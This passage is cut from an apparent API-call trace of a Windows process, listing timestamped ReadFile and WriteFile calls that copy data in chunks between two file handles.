lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.546] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.547] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.547] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.548] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.548] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.549] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.549] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.550] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.550] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.551] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.551] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.552] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x105, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.552] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.553] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ea, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.553] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.554] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.554] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.555] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.555] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.556] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.556] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.557] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.557] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.558] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x366, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.558] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.559] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.559] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.560] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.560] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.561] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.561] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x345, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.562] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.562] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.563] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.563] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3da, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.564] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.564] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.565] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.565] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.566] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.566] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.567] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.568] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.568] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.569] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x338, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.569] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.570] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.570] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.571] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ce, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.571] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.572] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.572] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.573] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x306, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.573] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.574] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.574] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.575] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.575] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.576] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.576] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.577] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xbd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.577] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.578] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.578] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.579] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.579] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.580] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.580] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.581] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.581] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.582] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.582] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.583] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.583] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.584] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.585] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.585] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x82, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.586] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.586] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.587] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.587] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.588] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.588] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.589] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x129, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.589] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.590] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.590] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.591] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.591] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.592] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.592] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.592] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.593] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.594] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x64, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.594] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.595] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.595] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.596] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, 